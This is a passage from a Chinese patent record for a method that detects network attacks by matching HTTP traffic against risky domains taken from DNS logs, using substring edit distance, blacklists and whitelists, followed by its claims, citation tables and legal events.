根据该风险域名与每个子报文字符串,得到每个子报文字符串对应的编辑距离;
将每个子报文字符串对应的编辑距离中数值最小的,作为该风险域名与该HTTP报文数据的子串编辑距离。
一种可能的实施方式中,所述获取模块701,还用于获取至少一个预设的白名单域名;
所述第一判断模块702,还用于根据所述白名单域名,判断所述日志文件中是否存在灰色域名,如果是,获取所述日志文件中的每个所述灰色域名;所述灰色域名中,不包含所述黑名单域名,也不包含所述白名单域名;
所述装置,还包括第三判断模块705,用于对逐一判断所述灰色域名是否为所述风险域名。
实施例四
如图8所示,本申请实施例还提供一种电子设备800,包括存储器801、处理器802及存储在存储器801上并可在处理器802上运行的计算机程序,所述处理器802执行所述程序时可以用于实现本申请实施例一或实施例二中的步骤。
实施例五
本申请实施例还提供一种计算机可读存储介质,其上存储有计算机程序,该程序被处理器执行时实现本申请实施例一或实施例二中的步骤。
综上所述,以上仅为本申请的较佳实施例而已,并非用于限定本申请的保护范围。凡在本申请的精神和原则之内,所作的任何修改、等同替换、改进等,均应包含在本申请的保护范围之内。
Claims (10)
1.一种网络攻击行为检测方法,其特征在于,包括:
获取预设时间范围内的域名系统DNS服务器中的日志文件和超文本传输协议HTTP报文数据;
获取包含至少一个黑名单域名的预设的黑名单,根据每个所述黑名单域名,判断所述日志文件中是否存在风险域名;如果存在风险域名,获取所述日志文件中的每个所述风险域名;所述风险域名中,包含所述黑名单中的至少一个黑名单域名;
针对每个HTTP报文数据,利用该HTTP报文数据与获取的每个风险域名逐一进行比对,计算该HTTP报文数据包含所比对的风险域名的几率;
如果存在包含于该HTTP报文数据的几率大于预设的几率阈值的风险域名,将该HTTP报文数据作为攻击检测结果存储。
2.根据权利要求1所述的方法,其特征在于,所述针对每个HTTP报文数据,利用该HTTP报文数据与每个风险域名进行比对,计算该HTTP报文数据包含所比对的风险域名的几率的步骤,包括:
针对每个风险域名,计算该风险域名与该HTTP报文数据的子串编辑距离;所述子串编辑距离为,该HTTP报文数据中的每个与该风险域名字符个数相同的子报文字符串与该风险域名的编辑距离;
根据所述子串编辑距离与该风险域名的字符个数,计算该风险域名包含于该HTTP报文数据的几率。
3.根据权利要求2所述的方法,其特征在于,所述计算该风险域名与该HTTP报文数据的子串编辑距离的步骤包括:
根据该风险域名的字符个数,从该HTTP报文数据中获取至少一个子报文字符串;所述子报文字符串为HTTP报文数据中截取的子字符串;每个所述子报文字符串,与该风险域名的字符个数相同;
根据该风险域名与每个子报文字符串,得到每个子报文字符串对应的编辑距离;
将每个子报文字符串对应的编辑距离中数值最小的,作为该风险域名与该HTTP报文数据的子串编辑距离。
4.根据权利要求1所述的方法,其特征在于,如果所述日志文件不存在所述风险域名,该方法还包括:
获取至少一个预设的白名单域名,根据所述白名单域名,判断所述日志文件中是否存在灰色域名,如果是,获取所述日志文件中的每个所述灰色域名;所述灰色域名中,不包含所述黑名单域名,也不包含所述白名单域名;
逐一判断每个所述灰色域名是否为所述风险域名;
如果所述该灰色域名是风险域名,则继续执行所述针对每个HTTP报文数据,利用该HTTP报文数据与获取的每个风险域名逐一进行比对,计算该HTTP报文数据包含所比对的风险域名的几率的步骤。
5.一种网络攻击行为检测装置,其特征在于,包括:
获取模块,用于获取预设时间范围内的DNS服务器中的日志文件和超文本传输协议HTTP报文数据;还用于包含至少一个黑名单域名的预设的黑名单;
第一判断模块,用于根据每个所述黑名单域名,判断所述日志文件中是否存在风险域名;如果存在风险域名,获取所述日志文件中的每个所述风险域名;所述风险域名中,包含所述黑名单中的至少一个黑名单域名;
第二判断模块,用于针对每个HTTP报文数据,利用该HTTP报文数据与获取的每个风险域名逐一进行比对,计算该HTTP报文数据包含所比对的风险域名的几率;还用于判断是否存在包含于该HTTP报文数据的几率大于预设的几率阈值的风险域名;
记录模块,用于在存在包含于该HTTP报文数据的几率大于预设的几率阈值的风险域名时,将该HTTP报文数据作为攻击检测结果存储。
6.根据权利要求5所述的装置,其特征在于,所述第二判断模块,包括:
编辑距离计算模块,用于针对每个风险域名,计算该风险域名与该HTTP报文数据的子串编辑距离;所述子串编辑距离为,该HTTP报文数据中的每个与该风险域名字符个数相同的子报文字符串与该风险域名的编辑距离;
几率计算模块,用于根据所述子串编辑距离与该风险域名的字符个数,计算该风险域名包含于该HTTP报文数据的几率。
7.根据权利要求6所述的装置,其特征在于,所述编辑距离计算模块,还用于:
根据该风险域名的字符个数,从该HTTP报文数据中获取至少一个子报文字符串;所述子报文字符串为HTTP报文数据中截取的子字符串;每个所述子报文字符串,与该风险域名的字符个数相同;
根据该风险域名与每个子报文字符串,得到每个子报文字符串对应的编辑距离;
将每个子报文字符串对应的编辑距离中数值最小的,作为该风险域名与该HTTP报文数据的子串编辑距离。
8.根据权利要求5所述的装置,其特征在于,所述获取模块,还用于获取至少一个预设的白名单域名;
所述第一判断模块,还用于根据所述白名单域名,判断所述日志文件中是否存在灰色域名,如果是,获取所述日志文件中的每个所述灰色域名;所述灰色域名中,不包含所述黑名单域名,也不包含所述白名单域名;
所述装置,还包括第三判断模块,用于逐一判断每个所述灰色域名是否为所述风险域名。
9.一种电子设备,包括存储器、处理器及存储在存储器上并可在处理器上运行的计算机程序,其特征在于,所述处理器执行所述程序时实现权利要求1-4任一项所述的方法的步骤。
10.一种计算机可读存储介质,其上存储有计算机程序,其特征在于,该程序被处理器执行时实现权利要求1-4任一项所述的方法的步骤。
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201910414132.1A CN111953638B (zh) | 2019-05-17 | 2019-05-17 | 网络攻击行为检测方法、装置及可读存储介质 |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201910414132.1A CN111953638B (zh) | 2019-05-17 | 2019-05-17 | 网络攻击行为检测方法、装置及可读存储介质 |
Publications (2)
Publication Number | Publication Date |
---|---|
CN111953638A true CN111953638A (zh) | 2020-11-17 |
CN111953638B CN111953638B (zh) | 2023-06-27 |
Family
ID=73336122
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN201910414132.1A Active CN111953638B (zh) | 2019-05-17 | 2019-05-17 | 网络攻击行为检测方法、装置及可读存储介质 |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN111953638B (zh) |
Cited By (3)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN113726775A (zh) * | 2021-08-30 | 2021-11-30 | 深信服科技股份有限公司 | 一种攻击检测方法、装置、设备及存储介质 |
CN114205126A (zh) * | 2021-11-25 | 2022-03-18 | 北京国泰网信科技有限公司 | 一种工业系统中攻击检测的方法、设备及介质 |
CN115378906A (zh) * | 2022-08-16 | 2022-11-22 | 北京轻网科技股份有限公司 | 一种基于vpn框架的本地dns代理方法、装置、设备及介质 |
Citations (7)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN101789940A (zh) * | 2010-01-28 | 2010-07-28 | 联想网御科技(北京)有限公司 | 一种防范dns请求报文洪泛攻击的方法及装置 |
CN102664878A (zh) * | 2012-04-10 | 2012-09-12 | 中国科学院计算机网络信息中心 | 仿冒域名检测方法及设备 |
CN104580249A (zh) * | 2015-01-28 | 2015-04-29 | 北京润通丰华科技有限公司 | 一种基于日志的僵木蠕网络分析方法和系统 |
CN106657001A (zh) * | 2016-11-10 | 2017-05-10 | 广州赛讯信息技术有限公司 | 一种基于Netflow及DNS日志的僵尸网络检测方法 |
CN107454109A (zh) * | 2017-09-22 | 2017-12-08 | 杭州安恒信息技术有限公司 | 一种基于http流量分析的网络窃密行为检测方法 |
CN107644166A (zh) * | 2017-09-22 | 2018-01-30 | 成都知道创宇信息技术有限公司 | 一种基于自动学习的web应用安全防护方法 |
CN109347805A (zh) * | 2018-09-19 | 2019-02-15 | 杭州安恒信息技术股份有限公司 | 一种基于dns的无回显sql注入检测方法 |
-
2019
- 2019-05-17 CN CN201910414132.1A patent/CN111953638B/zh active Active
Patent Citations (7)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN101789940A (zh) * | 2010-01-28 | 2010-07-28 | 联想网御科技(北京)有限公司 | 一种防范dns请求报文洪泛攻击的方法及装置 |
CN102664878A (zh) * | 2012-04-10 | 2012-09-12 | 中国科学院计算机网络信息中心 | 仿冒域名检测方法及设备 |
CN104580249A (zh) * | 2015-01-28 | 2015-04-29 | 北京润通丰华科技有限公司 | 一种基于日志的僵木蠕网络分析方法和系统 |
CN106657001A (zh) * | 2016-11-10 | 2017-05-10 | 广州赛讯信息技术有限公司 | 一种基于Netflow及DNS日志的僵尸网络检测方法 |
CN107454109A (zh) * | 2017-09-22 | 2017-12-08 | 杭州安恒信息技术有限公司 | 一种基于http流量分析的网络窃密行为检测方法 |
CN107644166A (zh) * | 2017-09-22 | 2018-01-30 | 成都知道创宇信息技术有限公司 | 一种基于自动学习的web应用安全防护方法 |
CN109347805A (zh) * | 2018-09-19 | 2019-02-15 | 杭州安恒信息技术股份有限公司 | 一种基于dns的无回显sql注入检测方法 |
Cited By (5)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN113726775A (zh) * | 2021-08-30 | 2021-11-30 | 深信服科技股份有限公司 | 一种攻击检测方法、装置、设备及存储介质 |
CN113726775B (zh) * | 2021-08-30 | 2022-09-30 | 深信服科技股份有限公司 | 一种攻击检测方法、装置、设备及存储介质 |
CN114205126A (zh) * | 2021-11-25 | 2022-03-18 | 北京国泰网信科技有限公司 | 一种工业系统中攻击检测的方法、设备及介质 |
CN115378906A (zh) * | 2022-08-16 | 2022-11-22 | 北京轻网科技股份有限公司 | 一种基于vpn框架的本地dns代理方法、装置、设备及介质 |
CN115378906B (zh) * | 2022-08-16 | 2024-02-13 | 北京轻网科技股份有限公司 | 一种基于vpn框架的本地dns代理方法、装置、设备及介质 |
Also Published As
Publication number | Publication date |
---|---|
CN111953638B (zh) | 2023-06-27 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
US11405359B2 (en) | Network firewall for mitigating against persistent low volume attacks | |
US10673884B2 (en) | Apparatus method and medium for tracing the origin of network transmissions using n-gram distribution of data | |
US11044270B2 (en) | Using private threat intelligence in public cloud | |
CN106357696B (zh) | 一种sql注入攻击检测方法及系统 | |
US8893278B1 (en) | Detecting malware communication on an infected computing device | |
US8515918B2 (en) | Method, system and computer program product for comparing or measuring information content in at least one data stream | |
US20090119769A1 (en) | Cross-site scripting filter | |
CN109768992B (zh) | 网页恶意扫描处理方法及装置、终端设备、可读存储介质 | |
CN111953638B (zh) | 网络攻击行为检测方法、装置及可读存储介质 | |
CN110602032A (zh) | 攻击识别方法及设备 | |
CN107347076B (zh) | Ssrf漏洞的检测方法及装置 | |
CN108259473A (zh) | Web服务器扫描防护方法 | |
CN110875907A (zh) | 一种访问请求控制方法及装置 | |
CN103701816A (zh) | 执行拒绝服务攻击的服务器的扫描方法和扫描装置 | |
US10951645B2 (en) | System and method for prevention of threat | |
CN113055399A (zh) | 注入攻击的攻击成功检测方法、系统及相关装置 | |
CN110392032B (zh) | 检测异常url的方法、装置及存储介质 | |
CN115941280B (zh) | 基于web指纹信息的渗透方法、装置、设备及介质 | |
CN111131166A (zh) | 一种用户行为预判方法及相关设备 | |
US10484422B2 (en) | Prevention of rendezvous generation algorithm (RGA) and domain generation algorithm (DGA) malware over existing internet services | |
CN111371917B (zh) | 一种域名检测方法及系统 | |
CN111147491B (zh) | 一种漏洞修复方法、装置、设备及存储介质 | |
CN117527354B (zh) | 一种攻击检测方法、装置、电子设备及存储介质 | |
Yaacob et al. | Moving towards positive security model for web application firewall | |
Das et al. | Defeating Cyber Attacks Due to Script Injection. |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||
GR01 | Patent grant |